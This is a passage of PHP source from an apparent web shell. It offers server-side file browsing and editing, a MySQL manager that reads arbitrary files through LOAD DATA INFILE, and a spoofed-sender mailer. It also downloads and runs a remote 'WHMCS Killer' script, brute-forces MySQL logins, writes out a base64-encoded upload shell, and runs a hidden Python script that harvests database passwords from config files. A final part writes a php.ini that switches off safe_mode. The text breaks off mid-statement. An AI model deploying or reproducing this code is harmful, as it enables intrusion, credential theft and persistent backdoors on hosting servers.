"\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
echo'</tr>
</table>
<div align="right">
<select class="inputz" name="sql_x">
<option value="">With selected:</option>
<option value="tbldrop">Drop</option>
<option value="tblempty">Empty</option>";
<option value="tbldump">Dump</option>";
<option value="tblcheck">Check table</option>";
<option value="tbloptimize">Optimize table</option>";
<option value="tblrepair">Repair table</option>";
<option value="tblanalyze">Analyze table</option>";
</select>
<input class="inputzbut" type="submit" value="Confirm">
</div>
</form>';
mysql_free_result($result);
}
}
}
}
}
else {
$xs = array("","newdb","serverstatus","servervars","processes","getfile");
if (in_array($sql_x,$xs)) {
echo '<table class="tab">
<tr>
<td style="border:1px solid #333333;padding:3px;"><b>Create new DB:</b>
<form action="'.$surl.'">
<input type="hidden" name="x" value="sql">
<input type="hidden" name="sql_x" value="newdb">
<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
<input class="inputz" type="text" name="sql_newdb" size="20">
<input class="inputzbut" type="submit" value="Create">
</form>
</td>
<td style="border:1px solid #333333;padding:3px;"><b>View File:</b>
<form action="'.$surl.'">
<input type="hidden" name="x" value="sql">
<input type="hidden" name="sql_x" value="getfile">
<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
<input class="inputz" type="text" name="sql_getfile" size="30" value="'.htmlspecialchars($sql_getfile).'">
<input class="inputzbut" type="submit" value="Get">
</form>
</td>
</tr>
</table>';
}
if (!empty($sql_x)) {
echo "<hr size=\"1\" noshade>";
if ($sql_x == "newdb") {
echo "<b>";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
}
if ($sql_x == "serverstatus") {
$result = mysql_query("SHOW STATUS", $sql_sock);
echo "<center><b>Server status variables:</b><br><br>";
echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
echo "</table></center>";
mysql_free_result($result);
}
if ($sql_x == "servervars") {
$result = mysql_query("SHOW VARIABLES", $sql_sock);
echo "<center><b>Server variables:</b><br><br>";
echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
echo "</table>";
mysql_free_result($result);
}
if ($sql_x == "processes") {
if (!empty($kill)) {
$query = "KILL ".$kill.";";
$result = mysql_query($query, $sql_sock);
echo "<b>Process #".$kill." was killed.</b>";
}
$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
echo "<center><b>Processes:</b><br><br>";
echo "<table class='tub'><th><b>ID</b></th><th><b>USER</b></th><th><b>HOST</b></th><th><b>DB</b></th><th><b>COMMAND</b></th><th><b>TIME</b></th><th><b>STATE</b></th><th><b>INFO</b></th><th><b>Action</b></th></tr>";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
echo "</table>";
mysql_free_result($result);
}
if ($sql_x == "getfile") {
$tmpdb = $sql_login."_tmpdb";
$select = mysql_select_db($tmpdb);
if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
if ($select) {
$created = FALSE;
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
$result = mysql_query("SELECT * FROM tmp_file;");
if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
else {
for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
$f = "";
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
mysql_free_result($result);
mysql_query("DROP TABLE tmp_file;");
}
}
mysql_drop_db($tmpdb);
}
}
}
}
echo '</td></tr>';
if ($sql_sock) {
$affected = @mysql_affected_rows($sql_sock);
if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
}
echo '</table></center>';
}
echo '</form>';
}
}
elseif(isset($_GET['x']) && ($_GET['x'] == 'email')){
if(isset($_POST['mail_send'])){
$mail_to = $_POST['mail_to'];
$mail_from = $_POST['mail_from'];
$mail_subject = $_POST['mail_subject'];
$mail_content = magicboom($_POST['mail_content']);
if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){
$msg = "email sent to $mail_to";
}
else $msg = "send email failed";
}
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=email" method="post">
<table class="cmdbox">
<tr><td>
<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>
<tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>
</table>
</form>
<?php
//////////////////////////////////////////////////////////////
} elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs_cr00t'))
{
$get_whmcs = "https://googledrive.com/host/0B2jkUMHhuhigNmowb3pUeEVta1U"; $whmcs = file_get_contents($get_whmcs); file_put_contents("whmcs_killer.php",$whmcs);
echo "<center>";
echo "<center><b><h1>+-=[ WHMCS Killer ]=-+</h1></b></center>
<table>
<tr>
<td>[+]</td>
<td>WHMCS Killer by RAB3OUN</td>
</tr>
<tr>
<td>[+]</td>
<td>Creating.... 50%</td>
</tr>
<tr>
<td>[+]</td>
<td>Creating.... 100%</td>
</tr>
<tr>
<td>[+]</td>
<td>Creating succes!!</td>
</tr>
<tr>
<td>[+]</td>
<td>=> <a href='whmcs_killer.php' target='_blank'>Clik Here</a></td> </tr>
</table>";
echo "</center>";
echo "<iframe src='whmcs_killer.php' width='100%' height='1000px'></iframe>"; }
elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
@ob_start();
@eval("phpinfo();");
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff,"<body>")+6;
$akhir = strpos($buff,"</body>");
echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
}
elseif(isset($_GET['view']) && ($_GET['view'] != "")){
if(is_file($_GET['view'])){
if(!isset($file)) $file = magicboom($_GET['view']);
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$filn = basename($file);
echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
<tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
<form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
</form>
</td></tr>
<tr><td>Size</td><td>".ukuran($file)."</td></tr>
<tr><td>Permission</td><td>".get_perms($file)."</td></tr>
<tr><td>Owner</td><td>".$owner."</td></tr>
<tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
<tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
<tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
<tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
<tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr>
</table>
";
if(isset($_GET['type']) && ($_GET['type']=='image')){
echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>";
}
elseif(isset($_GET['type']) && ($_GET['type']=='code')){
echo "<div class=\"viewfile\">";
$file = wordwrap(@file_get_contents($file),"240","\n");
@highlight_string($file);
echo "</div>";
}
else {
echo "<div class=\"viewfile\">";
echo nl2br(htmlentities((@file_get_contents($file))));
echo "</div>";
}
}
elseif(is_dir($_GET['view'])){
echo showdir($pwd,$prompt);
}
}
elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
if(isset($_POST['save'])){
$file = $_POST['saveas'];
$content = magicboom($_POST['content']);
if($filez = @fopen($file,"w")){
$time = date("d-M-Y H:i",time());
if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
else $msg = "failed to save";
@fclose($filez);
}
else $msg = "permission denied";
}
if(!isset($file)) $file = $_GET['edit'];
if($filez = @fopen($file,"r")){
$content = "";
while(!feof($filez)){
$content .= htmlentities(str_replace("''","'",fgets($filez)));
}
@fclose($filez);
}
?>
<form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
<table class="cmdbox">
<tr><td colspan="2">
<textarea class="output" name="content">
<?php echo $content; ?>
</textarea>
<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
&nbsp;<?php echo $msg; ?></td></tr>
</table>
</form>
<?php
}
elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">
<?php
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo 'bye!';
}
elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
<?php
//bruteforce
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
/*
Recoded By Cyberbaghost
*/
@set_time_limit(0);
@error_reporting(0);
if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
if($_POST['type'] == 'passwd'){
$e = explode("\n",$_POST['usernames']);
foreach($e as $value){
$k = explode(":",$value);
$username .= $k['0']." ";
}
}elseif($_POST['type'] == 'simple'){
$username = str_replace("\n",' ',$_POST['usernames']);
}
$a1 = explode(" ",$username);
$a2 = explode("\n",$_POST['passwords']);
$id2 = count($a2);
$ok = 0;
foreach($a1 as $user )
{
if($user !== '')
{
$user=trim($user);
for($i=0;$i<=$id2;$i++)
{
$pass = trim($a2[$i]);
if(@mysql_connect('localhost',$user,$pass))
{
echo "X'1n73ct~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
$ok++;
}
}
}
}
echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x'1n73ct</b>";
echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}
}
if($_POST['pass']=='password'){
@error_reporting(0);
$i = getenv('REMOTE_ADDR');
$d = date('D, M jS, Y H:i',time());
$h = $_SERVER['HTTP_HOST'];
$dir=$_SERVER['PHP_SELF'];
$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
$file = fopen(".php","w+");
$write = fwrite ($file ,base64_decode($back));
fclose($file);
chmod(".php",0755);
mkdir('config',0755);
$cp =
'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
$file = fopen("cp.py","w+");
$write = fwrite ($file ,base64_decode($cp));
fclose($file);
chmod("cp.py",0755);
$url = $_POST['url'];
echo"<center>
<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
system("python cp.py $url config");
unlink ('cp.py');
echo"</textarea>
</center>";
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}
if($_POST['matikan']=='sekatan'){
@error_reporting(0);
$phpini =
'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
$file = fopen("php.ini","w+");
$write = fwrite ($file ,base64_decode($phpini));
fclose($file);
$htaccess =
